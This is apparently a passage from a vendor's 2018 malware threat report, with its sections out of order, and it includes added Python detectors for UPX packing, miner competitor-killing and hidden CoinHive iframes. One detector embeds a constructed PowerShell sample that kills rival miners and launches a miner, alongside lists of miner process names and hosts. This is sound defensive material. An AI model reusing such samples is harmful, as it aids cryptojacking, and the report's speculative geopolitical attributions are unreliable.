This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Chart: Android-targeted malware in April]

4.2.2 May 2018

[Chart: Android-targeted malware in May]


4.2.3 June 2018

[Chart: Android-targeted malware in June]


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them over a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms spread as email attachments or links, but many also move between victim computers by other means, for example via exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 P2P Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Social media accounts can also be used to spread malware. One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos IM Worm; in 2012 the FBI arrested 10 people for spreading banking malware via social networks with Yahos.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (.exe) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as the local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the Administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Detections of specific exploits can be relatively rare, as the vulnerabilities they target are typically patched quickly once discovered.

In Q2 2018 the majority of the exploits Comodo detected targeted a favorite hacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructors

Constructors are applications used to generate malware files automatically.

For Q2, Alamar was the number one constructor Comodo detected; Microsoft rates this program a "Severe" threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that this malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even take the form of scripts. The compressed data usually carries its own decompression stub, or is a self-extracting archive, which recreates the original code from the compressed data in memory and then executes the malware. Encryption may also be used to conceal the malware from security software as another means of obfuscating the attack.

MUPX, Comodo's label for executables packed with a modified "Ultimate Packer for eXecutables", dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems; its decompression stub, built on the open-source UCL compression library, is only a few hundred bytes of code. Modified builds typically rename the UPX section names and patch the "UPX!" marker so that stock unpackers and simple signatures no longer recognize the file.
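Because a modified UPX defeats the obvious signatures, a triage check has to look at structure rather than names. The script below is an added example, not code from the report or from Comodo. It parses the PE section table with the standard library only and reports two indicators: the stock tells (UPX0/UPX1 section names or the "UPX!" marker) and a pattern that survives renaming, namely an empty first section with a large VirtualSize (the region the stub unpacks into) followed by a small section of near-random, high-entropy bytes (the compressed image plus stub). The PE builder and the three sample binaries are constructed fixtures for the demonstration; in practice `upx_indicators` is fed the bytes of a real file.

```python
"""Structural heuristics for UPX-style packing in a PE file (stdlib only)."""
from __future__ import annotations

import math
import struct
from dataclasses import dataclass


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    entropy: float  # Shannon entropy of the raw data, 0..8 bits per byte


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        hdr = pe[table + 40 * i: table + 40 * (i + 1)]
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", hdr)
        raw = pe[rptr:rptr + rsize] if rsize else b""
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"),
                                vsize, rsize, shannon_entropy(raw)))
    return sections


def upx_indicators(pe: bytes) -> dict[str, bool]:
    """Return the stock-UPX tell and the rename-resistant structural pattern."""
    secs = parse_sections(pe)
    names = {s.name for s in secs}
    stock = bool({"UPX0", "UPX1"} & names) or b"UPX!" in pe
    # UPX0 pattern: first section has no file data but a large virtual size
    # (unpack target); a later section holds the compressed, high-entropy blob.
    empty_first = bool(secs) and secs[0].raw_size == 0 and secs[0].virtual_size > 0
    packed_blob = any(s.raw_size > 0 and s.entropy > 7.0 for s in secs[1:])
    return {"stock_upx": stock, "modified_upx_pattern": empty_first and packed_blob}


def build_sample_pe(section_specs: list[tuple[bytes, int, bytes]]) -> bytes:
    """Constructed fixture: a minimal PE32 whose sections are (name, VirtualSize, raw bytes)."""
    e_lfanew, opt_size = 0x40, 0xE0  # standard PE32 optional header size; contents unused
    n = len(section_specs)
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * n
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    headers, body = b"", b""
    for name, vsize, raw in section_specs:
        ptr = raw_ptr + len(body) if raw else 0
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize,
                               0x1000, len(raw), ptr, 0, 0, 0, 0, 0xE0000040)
        body += raw
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + headers + body


# Three constructed samples: stock UPX, UPX with renamed sections, unpacked.
RANDOMISH = bytes(range(256)) * 8  # uniform byte distribution -> entropy 8.0
SAMPLES = {
    "stock_upx": build_sample_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x4000, RANDOMISH),
                                  (b".rsrc", 0x200, b"\0" * 512)]),
    "renamed_upx": build_sample_pe([(b".text", 0x20000, b""), (b".data", 0x4000, RANDOMISH)]),
    "clean": build_sample_pe([(b".text", 0x1000, b"\x90" * 2048), (b".data", 0x200, b"\0" * 512)]),
}

if __name__ == "__main__":
    for label, pe in SAMPLES.items():
        print(label, upx_indicators(pe))
```

The entropy threshold of 7.0 bits per byte is a working rule of thumb: compressed or encrypted data sits near 8.0, while ordinary x86 code and resources rarely exceed 6.5. The structural test is still a heuristic, since other packers produce the same empty-section-plus-blob layout, so treat a hit as a reason to unpack and inspect, not as a verdict.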

In Q2 2018, Russia was the number one home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files to avoid detection.

The top Virtual Tools Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. They include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number two and three respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section we examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the number one malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware found within every vertical and used for a wide variety of cyberattacks. Strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out. What happened on this day in the US, and what might help explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is likely that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware, because almost all activity, from social life to business, politics and national security, is now conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides ample evidence: Armenia's 2018 political revolution coincided with Comodo's largest malware detection within that country in Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018, provides some evidence for that argument. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for a real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April Iraq was preparing for a national election, including the problem of how best to secure its electronic dimension. At the beginning of July, just after the quarter's end, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories date from May 23: the first covers Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, consider Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland showed that it took place almost exclusively in Vantaa, a suburb of Helsinki, and precisely where the summit was scheduled to take place.

8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends that are likely to strongly influence the cybersecurity marketplace and IT end users. These trends not only show an upswing in malware across the world but point to possible future cybersecurity scenarios.

The increase in trojan malware in the last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in the quarters to come. Trojans also serve as a delivery vector for other types of malware. Taken together, these facts point to a large surge in host infections worldwide with a wide diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The spread of fileless malware, the evolution of cryptominers and the abuse of legitimate tools like PowerShell are clear evidence of this rise in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information yet lack protection comparable to that on desktop systems, which foreshadows new attacks and further mobile malware development. As more people use mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can expect rich pickings from compromising those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



The code downloads CoinMiner and checks whether a miner is already running.

The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner takes sole occupancy of the victim's computer, using its resources to mine cryptocurrency.
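The competitor-killing step described above lends itself to a simple detection. The following is an added example, not code from the report or from CoinMiner itself: it scans a PowerShell script (as captured, for instance, by Script Block Logging) for array literals whose members overlap a list of known miner process names, and for process-termination calls, and flags the script only when both are present. The sample script and the miner-name list are constructed for illustration.

```python
import re

# Constructed sample in the style the report describes (assumption: not the real CoinMiner script).
SAMPLE_SCRIPT = r'''
$malwares = @("xmrig", "minerd", "cpuminer", "nsminer")
$malwares2 = @("conhost", "svchost")
foreach ($m in $malwares) { Stop-Process -Name $m -Force -ErrorAction SilentlyContinue }
Start-Process -FilePath "$env:TEMP\svchost.exe" -ArgumentList "-o pool.example:3333"
'''

# Process names of common miners; an analyst would maintain this from their own telemetry (assumed list).
KNOWN_MINER_NAMES = {"xmrig", "minerd", "cpuminer", "nsminer", "xmr-stak", "cgminer", "bfgminer"}

# $name = @("a", "b", ...)  -> a PowerShell array literal assigned to a variable
ARRAY_RE = re.compile(r"\$(\w+)\s*=\s*@\(([^)]*)\)")
# Process-termination primitives on Windows
KILL_RE = re.compile(r"\b(Stop-Process|taskkill)\b", re.IGNORECASE)


def extract_arrays(script):
    """Return {variable_name: [string items]} for every @(...) array literal in the script."""
    arrays = {}
    for name, body in ARRAY_RE.findall(script):
        items = [s.strip().strip("\"'") for s in body.split(",") if s.strip()]
        arrays[name] = items
    return arrays


def score_competitor_killer(script, known=KNOWN_MINER_NAMES):
    """Flag scripts that both enumerate known miner process names and terminate processes."""
    miner_lists = {}
    for name, items in extract_arrays(script).items():
        overlap = sorted({i.lower() for i in items} & known)
        if overlap:
            miner_lists[name] = overlap          # which arrays name known miners, and which names
    kill_calls = len(KILL_RE.findall(script))    # how many termination calls appear
    return {
        "miner_lists": miner_lists,
        "kill_calls": kill_calls,
        "suspicious": bool(miner_lists) and kill_calls > 0,
    }


if __name__ == "__main__":
    print(score_competitor_killer(SAMPLE_SCRIPT))
```

Requiring both signals keeps ordinary administrative scripts (which stop processes but never name miners) and plain miner binaries (which name themselves but kill nothing) out of the alert queue.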


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to spot. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer: put its snippet of code into a web page and every visitor to the site mines coins for you.

As you can see, the CoinHive script is easily detected:

The CoinHive script

After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. In the second quarter perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.


As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co:

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's source but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
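The unmasking walked through above can be automated. As an added example (not the report's own code), the following Python detector pulls base64-looking blobs out of a page, decodes them, parses each decoded layer as HTML and reports any iframe that is 1x1 or points at the CoinHive short-link host cnhv.co shown above. The sample page, the short-link path in it and the two extra host names are constructed assumptions.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# cnhv.co is the short-link host shown in the report; the other two are assumed CoinHive hosts.
MINER_HOSTS = {"cnhv.co", "coinhive.com", "coin-hive.com"}
# Long runs of base64 alphabet characters, as found inside atob("...") or eval(...) wrappers.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a document fragment."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def decode_blobs(text):
    """Return the UTF-8 plaintext of every base64 blob in text that decodes cleanly."""
    out = []
    for blob in B64_RE.findall(text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text once decoded
    return out


def _tiny(value):
    """True if a width/height attribute is 1px or less (the 'invisible iframe' trick)."""
    try:
        return float(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_hidden_miner_iframes(page):
    """Scan the raw page and every decoded base64 layer for hidden or miner-hosted iframes."""
    findings = []
    for decoded, layer in [(False, page)] + [(True, t) for t in decode_blobs(page)]:
        parser = IframeCollector()
        parser.feed(layer)
        for attrs in parser.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", ""))
            if tiny or host in MINER_HOSTS:
                findings.append({"src": src, "host": host, "tiny": tiny,
                                 "known_miner_host": host in MINER_HOSTS, "encoded": decoded})
    return findings


# Constructed sample page: a 1x1 iframe to the short-link host, base64-wrapped in document.write(atob(...)).
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/abc123" width="1" height="1"></iframe>'  # path is made up
SAMPLE_PAGE = ('<html><body><h1>Welcome</h1><script>document.write(atob("'
               + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
               + '"))</script></body></html>')

if __name__ == "__main__":
    for finding in find_hidden_miner_iframes(SAMPLE_PAGE):
        print(finding)
```

The host check alone would miss a shortener that is not yet on the list, and the size check alone would flag legitimate tracking pixels, so the detector reports both signals separately and lets the analyst weigh them.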

The next malware in our list does not mine cryptocurrency but steals it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead steals cryptocurrency outright by redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. On finding one, it replaces it with the address of a wallet under the attacker's control, so the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack. A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
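As an added example (not the report's or the malware's code), the following Python reproduces the swap on the two addresses quoted above and shows the two checks a wallet front-end or clipboard-monitoring tool can make against it: remembering what the user copied and comparing it with what is about to be pasted, and verifying the Base58Check checksum of any address before it is used. The regex and the hijacker function are a simplified model of the behaviour described; the Bitcoin genesis-block address appears only as a known-valid checksum test vector.

```python
import hashlib
import re

BTC_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy (P2PKH '1...') and P2SH ('3...') Bitcoin addresses as they appear in free text.
BTC_ADDR_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")

# The two addresses quoted in the report: what the user copied and what the malware pasted.
USER_ADDR = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
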